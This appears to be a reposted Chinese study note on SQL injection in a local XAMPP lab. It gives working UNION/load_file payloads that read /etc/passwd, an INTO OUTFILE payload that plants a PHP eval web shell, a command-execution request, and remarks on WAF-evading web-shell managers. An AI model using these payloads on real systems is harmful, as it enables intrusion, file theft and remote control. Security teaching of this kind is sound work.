微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

3.SQL注入-查询漏洞二

一.不要开启PHPmyadmin

1.配置文件 /opt/lampp/etc/extra/httpd-xampp.conf

 2.修改PHPmyadmin目录名称为不容易猜测的

 

二.sql注入-文件读写以及木马植入

1.读写权限确认

 secure_file_priv = 空的时候,任意读写

 secure_file_priv = 某个路径的时候,只能在那个路径下读写

 secure_file_priv = NULL,不能读写

 #利用sql语句读取系统文件

-1 union select 1,2,3,load_file("/etc/passwd"),5

select load_file("/opt/lampp/htdocs/security/common.PHP")

#利用sql语句写入系统文件

select "hello world" into outfile "/opt/lampp/htdocs/security/muma.PHP"

-1 union select 1,2,3,"<?PHP @eval($_GET['a']);?>",5
into outfile "/opt/lampp/htdocs/security/muma.PHP"

#访问muma.PHP执行指令
muma.PHP?a=system("ifconfig");

三.中国菜刀

1.提前上传了木马

2.请求必须为POST类型,参数自定义

3.传输过程为明文传输,目前已经被WAF给拦截

 

四.Behinder冰蝎

1.冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开WAF

需要先上传一个冰蝎自己带加密解密功能的web shell

a=system("echo "<?PHP" >> /opt/lampp/htdocs/security/muma.PHP");

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐